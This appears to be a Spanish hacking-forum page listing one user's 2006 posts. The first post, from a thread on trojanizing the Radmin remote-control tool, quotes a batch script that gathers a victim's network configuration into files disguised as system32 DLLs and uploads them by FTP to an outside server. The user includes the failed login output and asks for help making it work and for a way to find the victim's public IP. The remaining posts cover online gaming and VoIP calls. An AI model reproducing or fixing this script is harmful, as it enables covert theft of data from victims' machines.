elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Troyanizando Radmin 2.1 control remoto en: 17 Febrero 2006, 19:58 pm
Buenas he probado el siguiente codigo de la pagina 2 y me sale un error que no logro resolver.

@echo off
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo firewer >>C:\WINDOWS\system32\Win32el.dll
echo mipassword >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll ftp.usuarios.lycos.es


Me devuelve lo siguiente: (el pass y el usuario q pongo son correctos)

Conectado a ftp.usuarios.lycos.es.
220 212.78.204.234 FTP server ready
Usuario (ftp.usuarios.lycos.es:(none)):
331 Password required for firewer.

530 Login incorrect.
Error al iniciar la sesión.
ftp> put C:\WINDOWS\system32\win32ip.dll victima.txt
530 Please login with USER and PASS
530 Please login with USER and PASS
ftp> QUIT
221 Goodbye.

Ai algo mal?

Por cierto esto:
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll

Solo da la ip privada del pc, como se hace para la ip publica?
2  Media / Juegos y Consolas / Moto gp2 online en: 2 Febrero 2006, 20:30 pm
Buenas,

Tengo el moto gp2 y puedo jugar a traves de la red con otro ordenador, el problema viene cuando quiero jugar con un amigo a traves de internet.

Creo la sesion le doi mi IP pero se le keda buscando y no se conecta a mi.

Ai que abrir algun puerto en el router? he buscado en google pero no lo encuentro.
3  Informática / Tutoriales - Documentación / Re: ...........Si tienes internet...tienes llamadas gratis a 35 Paises..."voipst en: 14 Enero 2006, 10:56 am
una duda del programa que se habla aqui
como son las llamadas?
1º pc a pc
2º pc a telefono fijo sin pasar por pc
por que pc a pc ahi muchas formas creo tal y como a puesto o2T7f6j2 arriba
saludos

puedes hacer llamadas a fijos de el listado de paises que esta en la web habra unas 15 +o- a pc nose si se podra, me imagino q si.

Si te compras un telefono especial que hay inalambrico puedes llamar sin tener el pc encendido.
Pero no lo se con certeza es por lo que eh leido por ai.
4  Informática / Tutoriales - Documentación / Re: ...........Si tienes internet...tienes llamadas gratis a 35 Paises..."voipst en: 14 Enero 2006, 01:23 am
lo que nose pa que tanto royo si ahora con el adsl regalan tarifa plana en llamadas.. y dudo muxisimo que la gente llame al extranjero xD
5  Informática / Tutoriales - Documentación / Re: ...........Si tienes internet...tienes llamadas gratis a 35 Paises..."voipst en: 13 Enero 2006, 19:30 pm
yo por probar esta tarde eh echo una llamada a mi propio fijo y eh estado 10 min, luego lo e cortado yo, osea q creo q no tiene limite ni nada

eso el voipstunt el otro solo me deja un minuto
6  Informática / Tutoriales - Documentación / Re: ...........Si tienes internet...tienes llamadas gratis a 35 Paises..."voipst en: 13 Enero 2006, 15:31 pm
acabo de bajarmelo, funciona way, lo unico que tiene un limite de un minuto, a partir de ai si no pagas se corta la llamada.

Por cierto el remitente cual es? tengo el domo pero no me funciona la identificacion de llamada
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines